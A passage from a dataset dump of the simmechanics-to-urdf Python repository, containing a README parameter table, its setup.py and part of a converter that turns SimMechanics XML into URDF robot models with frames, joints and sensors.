`joint`. **Please note that we specify this limit here in Degrees, but in the urdf it is expressed in Radians, the script will take care of internally converting this parameter.** |\n| upper_limit | No | Degrees | `upper` attribute of the `limit` child element of the URDF `joint`. **Please note that we specify this limit here in Degrees, but in the urdf it is expressed in Radians, the script will take care of internally converting this parameter.** |\n| velocity_limit | No | Radians/second | `velocity` attribute of the `limit` child element of the URDF `joint`. |\n| effort_limit | No | Newton meters | `effort` attribute of the `limit` child element of the URDF `joint`.\n| damping | No | Newton meter seconds / radians | `damping` of the `dynamics` child element of the URDF `joint`. |\n| friction | No | Newton meters | `friction` of the `dynamics` child element of the URDF `joint`. |\n" }, { "alpha_fraction": 0.5492505431175232, "alphanum_fraction": 0.5631691813468933, "avg_line_length": 27.303030014038086, "blob_id": "34f2e079ae096832d97b02e8ee3b440604220764", "content_id": "3ca919a0f0e61de8aa875c1679d80d775acc6a25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 934, "license_type": "no_license", "max_line_length": 71, "num_lines": 33, "path": "/setup.py", "repo_name": "robotology/simmechanics-to-urdf", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport sys\nfrom setuptools import setup, find_packages\n\n\nsetup(name='simmechanics_to_urdf',\n version='0.4.1',\n description='Converts SimMechanics XML to URDF',\n author='Silvio Traversaro, David V. Lu',\n author_email='[email protected]',\n url='https://github.com/robotology/simmechanics-to-urdf',\n packages=['simmechanics_to_urdf'],\n licence='BSD',\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.3'\n ],\n install_requires=[\n \"lxml\",\n \"numpy\",\n \"PyYAML >= 3.10\"\n ],\n entry_points={\n 'console_scripts': [\n 'simmechanics_to_urdf = simmechanics_to_urdf.firstgen:main',\n ]\n }\n )\n" }, { "alpha_fraction": 0.5520120859146118, "alphanum_fraction": 0.5625278949737549, "avg_line_length": 42.7359733581543, "blob_id": "9c23611994db9695d8f6398ff112da818ac46a8d", "content_id": "0a0bf6b20af26589093a6a02067d569fa46fe524", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 87297, "license_type": "no_license", "max_line_length": 219, "num_lines": 1996, "path": "/simmechanics_to_urdf/firstgen.py", "repo_name": "robotology/simmechanics-to-urdf", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport os\n\nimport xml.dom.minidom\nimport lxml.etree\nimport math\nimport numpy # for creating matrix to convert to quaternion\nimport yaml\nimport urdf_parser_py.urdf\nimport argparse\nimport csv\n\n# Conversion Factors\nINCH2METER = 0.0254\nSLUG2KG = 14.5939029\nSLUGININ2KGMM = .009415402\nMM2M = .001\n\n# Special Reference Frame(s)\nWORLD = \"WORLD\"\n\n# Arbitrary List of colors to give pieces different looks\nCOLORS = [(\"green\", (0, 1, 0, 1)), (\"black\", (0, 0, 0, 1)), (\"red\", (1, 0, 0, 1)),\n (\"blue\", (0, 0, 1, 1)), (\"yellow\", (1, 1, 0, 1)), (\"pink\", (1, 0, 1, 1)),\n (\"cyan\", (0, 1, 1, 1)), (\"green\", (0, 1, 0, 1)), (\"white\", (1, 1, 1, 1)),\n (\"dblue\", (0, 0, .8, 1)), (\"dgreen\", (.1, .8, .1, 1)), (\"gray\", (.5, .5, .5, 1))]\n\n# List of supported sensor types\nSENSOR_TYPES = [\"altimeter\", \"camera\", \"contact\", \"depth\", \"gps\", \"gpu_ray\", \"imu\", \"accelerometer\", \"gyroscope\",\n \"logical_camera\",\n \"magnetometer\", \"multicamera\", \"ray\", \"rfid\", \"rfidtag\", \"sonar\", \"wireless_receiver\",\n \"wireless_transmitter\"]\n\n# List of supported geometric shapes and their properties\nGEOMETRIC_SHAPES = {\n 'box': ['origin', 'size'],\n 'cylinder': ['origin', 'radius', 'length', ],\n 'sphere': ['origin', 'radius']}\n\n# epsilon for testing whether a number is close to zero\n_EPS = numpy.finfo(float).eps * 4.0\n\n# axis sequences for Euler angles\n_NEXT_AXIS = [1, 2, 0, 1]\n\n# map axes strings to/from tuples of inner axis, parity, repetition, frame\n_AXES2TUPLE = {\n 'sxyz': (0, 0, 0, 0), 'sxyx': (0, 0, 1, 0), 'sxzy': (0, 1, 0, 0),\n 'sxzx': (0, 1, 1, 0), 'syzx': (1, 0, 0, 0), 'syzy': (1, 0, 1, 0),\n 'syxz': (1, 1, 0, 0), 'syxy': (1, 1, 1, 0), 'szxy': (2, 0, 0, 0),\n 'szxz': (2, 0, 1, 0), 'szyx': (2, 1, 0, 0), 'szyz': (2, 1, 1, 0),\n 'rzyx': (0, 0, 0, 1), 'rxyx': (0, 0, 1, 1), 'ryzx': (0, 1, 0, 1),\n 'rxzx': (0, 1, 1, 1), 'rxzy': (1, 0, 0, 1), 'ryzy': (1, 0, 1, 1),\n 'rzxy': (1, 1, 0, 1), 'ryxy': (1, 1, 1, 1), 'ryxz': (2, 0, 0, 1),\n 'rzxz': (2, 0, 1, 1), 'rxyz': (2, 1, 0, 1), 'rzyz': (2, 1, 1, 1)}\n\n_TUPLE2AXES = dict((v, k) for k, v in _AXES2TUPLE.items())\n\n\ndef euler_matrix(ai, aj, ak, axes='sxyz'):\n \"\"\"Return homogeneous rotation matrix from Euler angles and axis sequence.\n\n ai, aj, ak : Euler's roll, pitch and yaw angles\n axes : One of 24 axis sequences as string or encoded tuple\n\n >>> R = euler_matrix(1, 2, 3, 'syxz')\n >>> numpy.allclose(numpy.sum(R[0]), -1.34786452)\n True\n >>> R = euler_matrix(1, 2, 3, (0, 1, 0, 1))\n >>> numpy.allclose(numpy.sum(R[0]), -0.383436184)\n True\n >>> ai, aj, ak = (4*math.pi) * (numpy.random.random(3) - 0.5)\n >>> for axes in _AXES2TUPLE.keys():\n ... R = euler_matrix(ai, aj, ak, axes)\n >>> for axes in _TUPLE2AXES.keys():\n ... R = euler_matrix(ai, aj, ak, axes)\n\n \"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes]\n except (AttributeError, KeyError):\n _TUPLE2AXES[axes] # noqa: validation\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i+parity]\n k = _NEXT_AXIS[i-parity+1]\n\n if frame:\n ai, ak = ak, ai\n if parity:\n ai, aj, ak = -ai, -aj, -ak\n\n si, sj, sk = math.sin(ai), math.sin(aj), math.sin(ak)\n ci, cj, ck = math.cos(ai), math.cos(aj), math.cos(ak)\n cc, cs = ci*ck, ci*sk\n sc, ss = si*ck, si*sk\n\n M = numpy.identity(4)\n if repetition:\n M[i, i] = cj\n M[i, j] = sj*si\n M[i, k] = sj*ci\n M[j, i] = sj*sk\n M[j, j] = -cj*ss+cc\n M[j, k] = -cj*cs-sc\n M[k, i] = -sj*ck\n M[k, j] = cj*sc+cs\n M[k, k] = cj*cc-ss\n else:\n M[i, i] = cj*ck\n M[i, j] = sj*sc-cs\n M[i, k] = sj*cc+ss\n M[j, i] = cj*sk\n M[j, j] = sj*ss+cc\n M[j, k] = sj*cs-sc\n M[k, i] = -sj\n M[k, j] = cj*si\n M[k, k] = cj*ci\n return M\n\ndef euler_from_matrix(matrix, axes='sxyz'):\n \"\"\"Return Euler angles from rotation matrix for specified axis sequence.\n\naxes : One of 24 axis sequences as string or encoded tuple\n\nNote that many Euler angle triplets can describe one matrix.\n\n>>> R0 = euler_matrix(1, 2, 3, 'syxz')\n>>> al, be, ga = euler_from_matrix(R0, 'syxz')\n>>> R1 = euler_matrix(al, be, ga, 'syxz')\n>>> numpy.allclose(R0, R1)\nTrue\n>>> angles = (4.0*math.pi) * (numpy.random.random(3) - 0.5)\n>>> for axes in _AXES2TUPLE.keys():\n... R0 = euler_matrix(axes=axes, *angles)\n... R1 = euler_matrix(axes=axes, *euler_from_matrix(R0, axes))\n... if not numpy.allclose(R0, R1): print axes, \"failed\"\n\n\"\"\"\n try:\n firstaxis, parity, repetition, frame = _AXES2TUPLE[axes.lower()]\n except (AttributeError, KeyError):\n _ = _TUPLE2AXES[axes]\n firstaxis, parity, repetition, frame = axes\n\n i = firstaxis\n j = _NEXT_AXIS[i + parity]\n k = _NEXT_AXIS[i - parity + 1]\n\n M = numpy.array(matrix, dtype=numpy.float64, copy=False)[:3, :3]\n if repetition:\n sy = math.sqrt(M[i, j] * M[i, j] + M[i, k] * M[i, k])\n if sy > _EPS:\n ax = math.atan2(M[i, j], M[i, k])\n ay = math.atan2(sy, M[i, i])\n az = math.atan2(M[j, i], -M[k, i])\n else:\n ax = math.atan2(-M[j, k], M[j, j])\n ay = math.atan2(sy, M[i, i])\n az = 0.0\n else:\n cy = math.sqrt(M[i, i] * M[i, i] + M[j, i] * M[j, i])\n if cy > _EPS:\n ax = math.atan2(M[k, j], M[k, k])\n ay = math.atan2(-M[k, i], cy)\n az = math.atan2(M[j, i], M[i, i])\n else:\n ax = math.atan2(-M[j, k], M[j, j])\n ay = math.atan2(-M[k, i], cy)\n az = 0.0\n\n if parity:\n ax, ay, az = -ax, -ay, -az\n if frame:\n ax, az = az, ax\n return ax, ay, az\n\n\ndef euler_from_quaternion(quaternion, axes='sxyz'):\n \"\"\"Return Euler angles from quaternion for specified axis sequence.\n\n >>> angles = euler_from_quaternion([0.06146124, 0, 0, 0.99810947])\n >>> numpy.allclose(angles, [0.123, 0, 0])\n True\n \"\"\"\n return euler_from_matrix(quaternion_matrix(quaternion), axes)\n\n\nclass Converter:\n def __init__(self):\n # initialize member variables\n self.links = {}\n self.frames = {}\n self.joints = {}\n self.names = {}\n self.colormap = {}\n self.colorindex = 0\n self.ref2nameMap = {}\n self.realRootLink = None\n self.outputString = \"\".encode('UTF-8')\n self.sensorIsValid = False\n self.sensorsDefaultMap = {}\n # map mapping USERADDED linkName+displayName to fid of the frame\n self.linkNameDisplayName2fid = {}\n\n # Start the Custom Transform Manager\n self.tfman = CustomTransformManager()\n\n # Extra Transforms for Debugging\n self.tfman.add([0, 0, 0], [0.70682518, 0, 0, 0.70682518], \"ROOT\", WORLD) # rotate so Z axis is up\n\n # convert sensor type to gazebo respective sensor type\n self.sensorTypeUrdf2sdf = {'imu': 'imu', 'accelerometer': 'imu', 'gyroscope': 'imu'}\n\n def convert(self, filename, yaml_configfile, csv_configfile, mode, outputfile_name):\n self.mode = mode\n\n # Parse the global YAML configuration file\n self.parseYAMLConfig(yaml_configfile)\n\n # Parse the joint CSV configuratio nfile\n self.parseJointCSVConfig(csv_configfile)\n\n # Parse the input file\n self.parse(xml.dom.minidom.parse(filename))\n self.buildTree(self.root)\n\n # Create the output\n self.output(self.root)\n\n # output the output\n if mode == \"xml\":\n # print(\"URDF model to print : \\n \" + str(self.result) + \"\\n\" )\n self.generateXML()\n addXMLBlobs(self.XMLBlobs, self.urdf_xml)\n self.addSensors()\n self.addOrigin()\n self.outputString = lxml.etree.tostring(self.urdf_xml, pretty_print=True)\n\n if mode == \"graph\":\n self.outputString = self.graph().encode('UTF-8')\n\n if mode == \"debug\":\n self.debugPrints()\n\n # save the output to file or print in the terminal\n if (outputfile_name is not None):\n f = open(outputfile_name, 'wb')\n f.write(self.outputString)\n f.close()\n else:\n print(self.outputString)\n\n def debugPrints(self):\n print(\n \"root_link_T_l_foot_CG :\\n \" + str(self.tfman.getHomTransform(\"X\" + \"root_link\", \"l_foot\" + \"CG\")[:3, 3]));\n print(\n \"root_link_T_r_foot_CG :\\n \" + str(self.tfman.getHomTransform(\"X\" + \"root_link\", \"r_foot\" + \"CG\")[:3, 3]));\n\n def generateXML(self):\n self.urdf_xml = self.result.to_xml();\n\n def addSensors(self):\n generatorGazeboSensors = URDFGazeboSensorsGenerator();\n generatorURDFSensors = URDFSensorsGenerator();\n # for the ft sensors, load the sensors as described in the YAML without further check\n for ftSens in self.forceTorqueSensors:\n referenceJoint = ftSens[\"jointName\"];\n frame = ftSens.get(\"frame\");\n frameName = ftSens.get(\"frameName\");\n if ('sensorName' not in ftSens.keys()):\n sensorName = referenceJoint\n else:\n sensorName = ftSens[\"sensorName\"];\n sensorBlobs = ftSens.get(\"sensorBlobs\");\n\n if (frameName is None):\n # If frame is not specified, the sensor frame is the link frame\n offset = [0.0, 0.0, 0.0];\n rot = quaternion_from_matrix(numpy.identity(4));\n else:\n # The default referenceLink is the sensorLink itself\n sensorJoint = self.joints[referenceJoint];\n for key in self.linkNameDisplayName2fid.keys():\n # Since frameName is univoque in the map\n if (frameName in key):\n referenceLink = key[0];\n # Get user added frame\n sensor_frame_fid = self.linkNameDisplayName2fid[(referenceLink, frameName)];\n (offset, rot) = self.tfman.get(\"X\" + referenceLink, sensor_frame_fid)\n pose = toGazeboPose(offset, rot);\n # Add sensor in Gazebo format\n ft_gazebo_el = generatorGazeboSensors.getURDFForceTorque(referenceJoint, sensorName,\n ftSens[\"directionChildToParent\"],\n sensorBlobs, frame, pose)\n self.urdf_xml.append(ft_gazebo_el);\n urdf_origin_el = toURDFOriginXMLElement(offset, rot);\n # Add sensor in URDF format\n ft_sensor_el = generatorURDFSensors.getURDFForceTorque(referenceJoint, sensorName,\n ftSens[\"directionChildToParent\"], frame, urdf_origin_el);\n self.urdf_xml.append(ft_sensor_el);\n\n # for the other sensors, we rely on pose given by a USERADDED frame\n for sensor in self.sensors:\n sensorLink = sensor[\"linkName\"];\n frameName = sensor.get(\"frameName\");\n referenceLink = sensor.get(\"frameReferenceLink\");\n sensorName = sensor.get(\"sensorName\");\n sensorType = sensor.get(\"sensorType\");\n updateRate = sensor.get(\"updateRate\");\n sensorBlobs = sensor.get(\"sensorBlobs\");\n\n self.isValidSensor(sensorType);\n\n if (frameName is None):\n # If frame is not specified, the sensor frame is the link frame\n offset = [0.0, 0.0, 0.0];\n rot = quaternion_from_matrix(numpy.identity(4));\n else:\n # The default referenceLink is the sensorLink itself\n if (referenceLink is None):\n referenceLink = sensorLink;\n\n # Get user added frame\n sensor_frame_fid = self.linkNameDisplayName2fid[(referenceLink, frameName)];\n (offset, rot) = self.tfman.get(\"X\" + sensorLink, sensor_frame_fid)\n\n\n if (sensorName is None):\n sensorName = sensorLink + \"_\" + frameName;\n # Add sensors in Gazebo format\n pose = toGazeboPose(offset, rot);\n\n\n # sys.stderr.write(\"Processing link \" + link['uid'] + \"\\n\")\n\n gazeboSensorType = self.sensorTypeUrdf2sdf.get(sensorType, sensorType);\n\n gazebo_sensor_el = generatorGazeboSensors.getURDFSensor(sensorLink, gazeboSensorType, sensorName, pose,\n updateRate, sensorBlobs)\n\n self.urdf_xml.append(gazebo_sensor_el);\n\n urdf_origin_el = toURDFOriginXMLElement(offset, rot);\n\n # Add sensor in URDF format\n sensor_el = generatorURDFSensors.getURDFSensor(sensorLink, sensorType, sensorName, urdf_origin_el)\n self.urdf_xml.append(sensor_el);\n\n def addOrigin(self):\n # Convert the origin element to Gazebo format (pose tag)\n gazebo_origin_el = lxml.etree.Element(\"gazebo\", None);\n pose = lxml.etree.SubElement(gazebo_origin_el,\"pose\");\n pose.text = toGazeboPoseFromEuler(self.originXYZ, self.originRPY);\n\n # Add it to the URDF\n self.urdf_xml.append(gazebo_origin_el);\n\n def parseYAMLConfig(self, configFile):\n \"\"\"Parse the YAML configuration File, if it exists.\n Set the fields the default if the config does\n not set them \"\"\"\n if configFile == None:\n configuration = {}\n else:\n configuration = yaml.load(open(configFile, 'r'))\n if configuration == None:\n configuration = {}\n\n self.freezeList = []\n self.redefinedjoints = {}\n self.assignedCollisionGeometry = {}\n\n self.root = configuration.get('root', None)\n self.extrajoints = configuration.get('extrajoints', {})\n self.extraframes = []\n self.filenameformat = configuration.get('filenameformat', None)\n self.filenameformatchangeext = configuration.get('filenameformatchangeext', None)\n if (self.filenameformat is None and self.filenameformatchangeext is None):\n # if neither filenameformat nor filenameformatchangeext is defined, use the default\n self.filenameformat = '%s'\n if (self.filenameformat is not None and self.filenameformatchangeext is not None):\n #\n print(\"Error: both filenameformat and filenameformatchangeext are defined\")\n assert (False)\n\n self.name = configuration.get('robotName', None)\n\n self.originXYZ = configuration.get('originXYZ', [0.0,0.0,0.0])\n self.originRPY = configuration.get('originRPY', [0.0,0.0,0.0])\n\n epsilon = configuration.get('epsilon', None)\n if (epsilon is not None):\n global _EPS\n _EPS = float(epsilon)\n\n self.forcelowercase = configuration.get('forcelowercase', True)\n\n self.stringToRemoveFromMeshFileName = configuration.get('stringToRemoveFromMeshFileName', False)\n\n ## Frames related options\n\n # If the exportAllUserAdded frame is setted, export all USERADDED frames\n self.exportAllUseradded = configuration.get('exportAllUseradded', False)\n\n # Load the linkFrames\n self.linkFrames = configuration.get('linkFrames', [])\n self.linkFramesMap = {}\n for link_frame in self.linkFrames:\n # add default frameReferenceLink if not included\n if (link_frame.get(\"frameReferenceLink\") is None):\n link_frame[\"frameReferenceLink\"] = link_frame[\"linkName\"];\n self.linkFramesMap[link_frame[\"linkName\"]] = link_frame;\n\n # Get a list of sensors\n self.forceTorqueSensors = configuration.get('forceTorqueSensors', {});\n self.sensors = configuration.get('sensors', {});\n\n # Load the exported frames\n exportedFrames = configuration.get('exportedFrames', [])\n self.exportedFramesMap = {}\n for exported_frame in exportedFrames:\n if (exported_frame.get(\"frameReferenceLink\") is not None):\n self.exportedFramesMap[\n (exported_frame[\"frameReferenceLink\"], exported_frame[\"frameName\"])] = exported_frame;\n else:\n # if the frameReferenceLink is missing, just add the export_frame dict using only the frameName as key:\n # we will add the full tutple (frameReferenceLink,frameName) later\n self.exportedFramesMap[exported_frame[\"frameName\"]] = exported_frame;\n\n\n # Augment the exported frames with sensors for which the exportFrameInURDF option is enabled\n for ftSens in self.forceTorqueSensors:\n if( (ftSens.get(\"exportFrameInURDF\") is not None) and ftSens[\"exportFrameInURDF\"] ):\n if ((ftSens.get(\"frameName\") is None) or (ftSens.get(\"linkName\") is None)):\n print(\"Error: missing frameName or linkName\")\n assert (False)\n exported_frame = {}\n exported_frame[\"frameName\"] = ftSens[\"frameName\"]\n if (ftSens.get(\"exportedFrameName\") is not None):\n exported_frame[\"exportedFrameName\"] = ftSens[\"exportedFrameName\"];\n elif(ftSens.get(\"sensorName\") is not None):\n exported_frame[\"exportedFrameName\"] = ftSens[\"sensorName\"];\n else:\n exported_frame[\"exportedFrameName\"] = ftSens[\"jointName\"];\n\n if (ftSens.get(\"frameReferenceLink\") is not None):\n exported_frame[\"frameReferenceLink\"] = ftSens[\"frameReferenceLink\"];\n else:\n exported_frame[\"frameReferenceLink\"] = ftSens[\"linkName\"];\n\n self.exportedFramesMap[\n (exported_frame[\"frameReferenceLink\"], exported_frame[\"frameName\"])] = exported_frame;\n\n\n\n # Get default parameters in \"sensors\" list\n # As we build the list of default sensors, we track the\n # respective references to remove from self.sensors\n sensorsToRemove = [];\n for sensor in self.sensors:\n if (sensor.get(\"sensorName\") == 'default'):\n # for caution, void frame names\n sensor[\"frameName\"] = None;\n sensor[\"exportedFrameName\"] = None;\n # copy parameters\n self.sensorsDefaultMap[sensor.get(\"sensorType\")] = sensor.copy();\n sensorsToRemove.append(sensor);\n\n # Remove default sensor parameters objects from sensors list\n for sensor in sensorsToRemove:\n self.sensors.remove(sensor);\n\n # Go again through the \"sensors\" list and replace unset values by the default ones\n for sensor in self.sensors:\n defaultSensor = self.sensorsDefaultMap.get(sensor.get(\"sensorType\"));\n if (defaultSensor is not None):\n mergedSensor = defaultSensor.copy();\n mergedSensor.update(sensor);\n sensor.update(mergedSensor);\n\n for sensor in self.sensors:\n if (sensor[\"exportFrameInURDF\"]):\n exported_frame = {}\n exported_frame[\"frameName\"] = sensor[\"frameName\"]\n if (sensor.get(\"exportedFrameName\") is not None):\n exported_frame[\"exportedFrameName\"] = sensor[\"exportedFrameName\"];\n else:\n exported_frame[\"exportedFrameName\"] = sensor[\"sensorName\"];\n\n if (sensor.get(\"frameReferenceLink\") is not None):\n exported_frame[\"frameReferenceLink\"] = sensor[\"frameReferenceLink\"];\n else:\n exported_frame[\"frameReferenceLink\"] = sensor[\"linkName\"];\n\n self.exportedFramesMap[\n (exported_frame[\"frameReferenceLink\"], exported_frame[\"frameName\"])] = exported_frame;\n\n # Load scales options\n scale_str = configuration.get('scale', None)\n if (scale_str is not None):\n self.scale = [float(scale_el) for scale_el in scale_str.split()]\n else:\n self.scale = None\n self.freezeAll = configuration.get('freezeAll', False)\n self.baseframe = configuration.get('baseframe', WORLD)\n self.damping_fallback = configuration.get('damping', 0.1)\n self.friction_fallback = configuration.get('friction', None)\n\n self.effort_limit_fallback = configuration.get('effort_limit', 50000)\n self.velocity_limit_fallback = configuration.get('velocity_limit', 50000)\n\n self.rename = configuration.get('rename', {})\n\n # Get map of links for which we explicitly assign the mass\n self.assignedMasses = configuration.get('assignedMasses', {})\n self.assignedColors = configuration.get('assignedColors', {})\n\n # Get map of links for which we explicitly assign the mass\n self.assignedInertiasMap = {}\n assignedInertiasVector = configuration.get('assignedInertias', {})\n for el in assignedInertiasVector:\n link = el[\"linkName\"]\n self.assignedInertiasMap[link] = el;\n\n # Get map of links for which we explicitly assign the collision geometry\n assignedCollisionGeometryVector = configuration.get('assignedCollisionGeometry', {})\n for el in assignedCollisionGeometryVector:\n link = el[\"linkName\"]\n self.assignedCollisionGeometry[link] = el;\n\n # Get lists converted to strings\n self.removeList = configuration.get('remove', {})\n self.freezeList = [str(e) for e in configuration.get('freeze', [])]\n\n # Get map with key converted to strings\n jointmap = configuration.get('redefinedjoints', {})\n for x in jointmap.keys():\n self.redefinedjoints[str(x)] = jointmap[x]\n\n # Add Extra Frames\n for frame in configuration.get('moreframes', []):\n self.tfman.add(frame['offset'], frame['orientation'], frame['parent'], frame['child'])\n\n # SimMechanics bug inertia workaround\n mirroredInertia = configuration.get('mirroredInertia', [])\n self.mirroredInertiaMap = {}\n for mirrored_link_dict in mirroredInertia:\n mirroredLink = mirrored_link_dict[\"mirroredLink\"]\n self.mirroredInertiaMap[mirroredLink] = mirrored_link_dict;\n\n self.inertiaWorkaround = configuration.get('inertiaWorkaround', None);\n if (self.inertiaWorkaround is not None):\n self.mirroredLinks = self.inertiaWorkaround[\"mirroredLinks\"].split()\n else:\n self.mirroredLinks = None;\n\n # Get a list of joints for which we want to invert the rotation axis direction\n self.reverseRotationAxis = configuration.get('reverseRotationAxis', []);\n\n # Get a list of blob of XML tags to add to the URDF\n self.XMLBlobs = configuration.get(\"XMLBlobs\", [])\n\n def parseJointCSVConfig(self, configFile):\n \"\"\"Parse the CSV configuration File, if it exists.\"\"\"\n self.joint_configuration = {}\n if configFile is not None:\n with open(configFile, 'r') as csvfile:\n my_dialect = csv.Sniffer().sniff(csvfile.read(1024))\n csvfile.seek(0)\n reader = csv.DictReader(csvfile, dialect=my_dialect)\n for row in reader:\n self.joint_configuration[row[\"joint_name\"]] = row\n\n def parse(self, element):\n \"\"\"Recursively goes through all XML elements\n and branches off for important elements\"\"\"\n name = element.localName\n # Grab name from root element AND recursively parse\n if name == \"PhysicalModelingXMLFile\":\n dict = getDictionary(element)\n if (self.name is None):\n self.name = dict['name']\n\n if name == \"Body\":\n self.parseLink(element)\n elif name == \"SimpleJoint\":\n self.parseJoint(element)\n elif name == \"Ground\":\n dict = getDictionary(element)\n self.parseFrames(dict['frame'], \"GROUND\")\n else:\n for child in element.childNodes:\n self.parse(child)\n\n def parseLink(self, link):\n \"\"\"Parse the important bits of a link element\"\"\"\n linkdict = getDictionary(link)\n uid = self.getName(linkdict['name'])\n linkdict['uid'] = uid;\n linkdict['neighbors'] = []\n linkdict['children'] = []\n linkdict['jointmap'] = {}\n\n # Save the frames for separate parsing\n frames = linkdict['frames']\n linkdict['frames'] = None\n\n # Save the color if it exists\n if 'MaterialProp' in linkdict:\n # color\n colorelement = linkdict['MaterialProp'][1]\n color = colorelement.childNodes[0].data\n # ambient\n ambientelement = linkdict['MaterialProp'][3]\n ambient = ambientelement.childNodes[0].data\n linkdict['ambient'] = float(ambient);\n # diffuse\n diffuseelement = linkdict['MaterialProp'][5]\n diffuse = diffuseelement.childNodes[0].data\n linkdict['diffuse'] = float(diffuse);\n # specular\n specularelement = linkdict['MaterialProp'][7]\n specular = specularelement.childNodes[0].data\n linkdict['specular'] = float(specular);\n # transparency\n transparencyelement = linkdict['MaterialProp'][11]\n transparency = transparencyelement.childNodes[0].data\n linkdict['color'] = list(map(float, color.split(\",\"))) + [1.0 - float(transparency)]\n\n linkdict['MaterialProp'] = None\n\n self.links[uid] = linkdict\n self.parseFrames(frames, uid)\n\n # Save First Actual Element as Root, if not defined already\n if self.root == None and \"geometryFileName\" in linkdict:\n self.root = uid\n\n def parseFrames(self, frames, parent_link):\n \"\"\"Parse the frames from xml\"\"\"\n for frame in frames:\n if frame.nodeType is frame.TEXT_NODE:\n continue\n fdict = getDictionary(frame)\n # We don't identify frames with ref attribute because USERADDED\n # frames don't have ref attributes. We always use instead the\n # urdf_link + name scheme (note that for added frames simmechanics link\n # is different from urdf_link\n fid = parent_link + fdict['name']\n\n # for using the ref numbers of the frame we build a map from the ref numbers\n # to the names\n # fid = str(frame.getAttribute(\"ref\"))\n ref = str(frame.getAttribute(\"ref\"))\n\n self.ref2nameMap[ref] = fid;\n\n fdict['parent'] = parent_link\n\n offset = getlist(fdict['position'])\n\n # for models mirrored in Creo there is a strange bug\n # in SimMechanics Link that causes the inertia of the\n # mirrored links to be wrongly placed. We add here\n # some specific workaround for those link, if this\n # is requested in the YAML file\n if (self.mirroredLinks is not None):\n if (fdict['name'] == 'CG' and parent_link in self.mirroredLinks):\n offset[2] = -offset[2];\n\n units = fdict['positionUnits']\n for i in range(0, len(offset)):\n offset[i] = convert(offset[i], units)\n\n orientation = getlist(fdict['orientation'])\n quat = matrixToQuaternion(orientation)\n # If the frame does not have a reference number,\n # use the name plus a suffix (for CG or CS1...\n # If the frame does not have a reference number,\n # but it is a USERADDED frame (frame added on the CAD\n # for export in simmechanics) and the exportAllUserAdded\n # option is set to True, export the frame using the displayName tag\n # otherwise ignore the frame\n if fdict['nodeID'].endswith('(USERADDED)'):\n useradded_frame_name = fdict['displayName']\n\n # clean all possible exportedFrames that were missing the frameReferenceLink option\n if useradded_frame_name in self.exportedFramesMap.keys():\n buf_export_frame = self.exportedFramesMap[useradded_frame_name]\n buf_export_frame[\"frameRefenceLink\"] = parent_link;\n self.exportedFramesMap[(parent_link, useradded_frame_name)] = buf_export_frame;\n\n # Frame is added if exportAllUseradded is setted or\n # if frame is part of exportedFrames structure\n if self.exportAllUseradded or () or (\n (parent_link, useradded_frame_name) in self.exportedFramesMap.keys()):\n map_key = (parent_link, useradded_frame_name);\n if (map_key in self.exportedFramesMap.keys()):\n if (\"exportedFrameName\" in self.exportedFramesMap[map_key].keys()):\n useradded_frame_name = self.exportedFramesMap[map_key][\"exportedFrameName\"];\n if (\"additionalTransformation\" in self.exportedFramesMap[map_key].keys()):\n addTransform = self.exportedFramesMap[map_key][\"additionalTransformation\"];\n\n if (addTransform is not None):\n assert(len(addTransform) is 6)\n sensorOriginal_R_sensorModifed = euler_matrix(addTransform[3], addTransform[4], addTransform[5])\n link_R_sensorOriginal = quaternion_matrix(quat)\n offset = numpy.add(offset, numpy.matmul(link_R_sensorOriginal[0:3,0:3], addTransform[0:3]))\n quat = quaternion_from_matrix(numpy.matmul(link_R_sensorOriginal, sensorOriginal_R_sensorModifed))\n fid = useradded_frame_name + \"CS1\"\n extraframe = {'parentlink': parent_link, 'framename': useradded_frame_name}\n self.extraframes = self.extraframes + [extraframe]\n # add link to self.links structure\n linkdict = {}\n linkdict['name'] = useradded_frame_name\n fdict['parent'] = useradded_frame_name\n linkdict['neighbors'] = []\n linkdict['children'] = []\n linkdict['jointmap'] = {}\n linkdict['frames'] = None\n linkdict['uid'] = linkdict['name']\n self.links[useradded_frame_name] = linkdict\n\n # Storing the displayName to the fid of the frame, to retrive the USERADDED frame when assigning link frames\n self.linkNameDisplayName2fid[(parent_link, fdict['displayName'])] = fid;\n\n self.tfman.add(offset, quat, WORLD, fid)\n self.frames[fid] = fdict\n\n def parseJoint(self, element):\n \"\"\"Parse the joint from xml\"\"\"\n dict = getDictionary(element)\n joint = {}\n joint['name'] = dict['name']\n uid = self.getName(joint['name'])\n\n frames = element.getElementsByTagName(\"Frame\")\n ref_parent = str(frames[0].getAttribute(\"ref\"))\n ref_child = str(frames[1].getAttribute(\"ref\"))\n\n joint['ref_parent'] = ref_parent\n joint['ref_child'] = ref_child\n type = element.getElementsByTagName(\"Primitive\")\n\n # If there multiple elements, assume a fixed joint\n # \\todo TODO fix and remove this assumption\n if len(type) == 1:\n pdict = getDictionary(type[0])\n joint['type'] = pdict['name']\n joint['axis'] = pdict['axis']\n joint['axisReferenceFrame'] = pdict['referenceFrame']\n if joint['type'] == 'weld':\n joint['type'] = 'fixed'\n else:\n joint['type'] = 'fixed'\n\n # Ignore joints on the remove list\n # print(\"Parsing joint \" + joint['name'])\n # print(\"Removelist: \")\n # print(self.removeList)\n if (uid in self.removeList) or (joint['name'] in self.removeList):\n # print(joint['name']+\" is in removelist\")\n return\n\n # Force joints to be fixed on the freezeList\n if (uid in self.freezeList) or (joint['name'] in self.freezeList) or self.freezeAll:\n joint['type'] = 'fixed'\n\n # Redefine specified joints on redefined list\n if joint['ref_parent'] in self.redefinedjoints.keys():\n jdict = self.redefinedjoints[joint['ref_parent']]\n if 'name' in jdict:\n uid = jdict['name']\n\n # Default to continuous joints\n joint['type'] = jdict.get('type', 'continuous')\n\n if 'axis' in jdict:\n # print(\"axis\" + str(jdict['axis']))\n joint['axis'] = jdict['axis']\n joint['axisReferenceFrame'] = jdict['referenceFrame']\n if 'limits' in jdict:\n joint['limits'] = jdict['limits']\n\n # If some limits are defined in the CSV 